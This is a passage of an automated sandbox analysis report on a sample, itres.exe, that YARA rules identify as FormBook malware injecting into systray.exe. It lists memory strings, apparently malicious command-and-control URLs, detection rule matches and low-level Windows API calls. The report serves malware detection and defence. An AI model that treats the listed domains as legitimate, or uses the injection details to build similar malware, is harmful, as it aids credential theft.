          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: itres.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: itres.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://winp112727.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Anti_Wrinkle_Creams.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Cheap_Air_Tickets.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1jo
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Health_Insurance.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Online_classifieds.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Parental_Control.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Top_10_Luxury_Cars.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oW
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/display.cfm
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/find_a_tutor.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joKj137
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=1
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=2
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/sk-logabpstatus.php?a=M0RsYjFCcHhWaHlBWXk1TjYySVZRdC9GazNTNTJEUityOHdJK
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmpString found in binary or memory: https://www.clicrhonealpes.com/d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3Ssn
          Source: itres.exeString found in binary or memory: https://www.digicert.com/CPS0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5C404 NtSetInformationThread,0_2_00A5C404
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5C402 NtSetInformationThread,0_2_00A5C402
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5CD82 NtSetInformationThread,0_2_00A5CD82
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417987 NtReadFile,1_2_00417987
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759540 NtReadFile,LdrInitializeThunk,4_2_04759540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047595D0 NtClose,LdrInitializeThunk,4_2_047595D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04759660
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759650 NtQueryValueKey,LdrInitializeThunk,4_2_04759650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759610 NtEnumerateValueKey,LdrInitializeThunk,4_2_04759610
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_047596E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047596D0 NtCreateKey,LdrInitializeThunk,4_2_047596D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759710 NtQueryInformationToken,LdrInitializeThunk,4_2_04759710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759FE0 NtCreateMutant,LdrInitializeThunk,4_2_04759FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759780 NtMapViewOfSection,LdrInitializeThunk,4_2_04759780
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04759860
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759840 NtDelayExecution,LdrInitializeThunk,4_2_04759840
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04759910
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047599A0 NtCreateSection,LdrInitializeThunk,4_2_047599A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759A50 NtCreateFile,LdrInitializeThunk,4_2_04759A50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759B00 NtSetValueKey,LdrInitializeThunk,4_2_04759B00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759560 NtWriteFile,4_2_04759560
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0475AD30 NtSetContextThread,4_2_0475AD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759520 NtWaitForSingleObject,4_2_04759520
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047595F0 NtQueryInformationFile,4_2_047595F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759670 NtQueryInformationProcess,4_2_04759670
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0475A770 NtOpenThread,4_2_0475A770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759770 NtSetInformationFile,4_2_04759770
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759760 NtOpenProcess,4_2_04759760
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759730 NtQueryVirtualMemory,4_2_04759730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0475A710 NtOpenProcessToken,4_2_0475A710
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047597A0 NtUnmapViewOfSection,4_2_047597A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0475B040 NtSuspendThread,4_2_0475B040
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759820 NtEnumerateKey,4_2_04759820
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047598F0 NtReadVirtualMemory,4_2_047598F0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047598A0 NtWriteVirtualMemory,4_2_047598A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759950 NtQueueApcThread,4_2_04759950
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047599D0 NtCreateProcessEx,4_2_047599D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759A20 NtResumeThread,4_2_04759A20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759A10 NtQuerySection,4_2_04759A10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759A00 NtProtectVirtualMemory,4_2_04759A00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04759A80 NtOpenDirectoryObject,4_2_04759A80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0475A3B0 NtGetContextThread,4_2_0475A3B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87A60 NtClose,4_2_02E87A60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87B10 NtAllocateVirtualMemory,4_2_02E87B10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E879E0 NtReadFile,4_2_02E879E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87930 NtCreateFile,4_2_02E87930
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87B0A NtAllocateVirtualMemory,4_2_02E87B0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E879DA NtReadFile,4_2_02E879DA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E87987 NtReadFile,4_2_02E87987
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A504C00_2_00A504C0
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A536B80_2_00A536B8
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5A8700_2_00A5A870
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A53B580_2_00A53B58
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A57CF00_2_00A57CF0
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5CF790_2_00A5CF79
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A52F500_2_00A52F50
          Source: C:\Users\user\Desktop\itres.exeCode function: 0_2_00A5A85F0_2_00A5A85F
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041C2A71_2_0041C2A7
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041ABE31_2_0041ABE3
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041ABE61_2_0041ABE6
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041B4641_2_0041B464
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041BCC51_2_0041BCC5
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_0041B6191_2_0041B619
          Source: C:\Users\user\Desktop\itres.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473B4774_2_0473B477
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047DD4664_2_047DD466
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0472841F4_2_0472841F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047D44964_2_047D4496
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E1D554_2_047E1D55
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04710D204_2_04710D20
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E2D074_2_047E2D07
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0472D5E04_2_0472D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E25DD4_2_047E25DD
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047425814_2_04742581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047D2D824_2_047D2D82
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_04736E304_2_04736E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047DD6164_2_047DD616
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047356004_2_04735600
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E2EF74_2_047E2EF7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047C1EB64_2_047C1EB6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E1FF14_2_047E1FF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047EDFCE4_2_047EDFCE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473A8304_2_0473A830
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047EE8244_2_047EE824
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047D10024_2_047D1002
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E28EC4_2_047E28EC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047420A04_2_047420A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E20A84_2_047E20A8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0472B0904_2_0472B090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047341204_2_04734120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0471F9004_2_0471F900
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047399BF4_2_047399BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473B2364_2_0473B236
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047CFA2B4_2_047CFA2B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047D4AEF4_2_047D4AEF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E22AE4_2_047E22AE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473AB404_2_0473AB40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047BCB4F4_2_047BCB4F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047E2B284_2_047E2B28
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473A3094_2_0473A309
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047C23E34_2_047C23E3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047D03DA4_2_047D03DA
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0474ABD84_2_0474ABD8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_047DDBD24_2_047DDBD2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0474EBB04_2_0474EBB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0473EB9A4_2_0473EB9A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0474138B4_2_0474138B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8C2A74_2_02E8C2A7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E78A404_2_02E78A40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8ABE34_2_02E8ABE3
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8ABE64_2_02E8ABE6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8B6194_2_02E8B619
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E72FB04_2_02E72FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8BCC54_2_02E8BCC5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E8B4644_2_02E8B464
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E72D894_2_02E72D89
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_02E72D904_2_02E72D90
          Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0471B150 appears 145 times
          Source: itres.exeStatic PE information: invalid certificate
          Source: itres.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: itres.exeBinary or memory string: OriginalFilename vs itres.exe
          Source: itres.exe, 00000000.00000002.183528208.00000000034AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.dll6 vs itres.exe
          Source: itres.exeBinary or memory string: OriginalFilename vs itres.exe
          Source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs itres.exe
          Source: itres.exe, 00000001.00000002.220957412.0000000000E16000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs itres.exe
          Source: itres.exeBinary or memory string: OriginalFilenameGoogle Chrome.exe< vs itres.exe
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
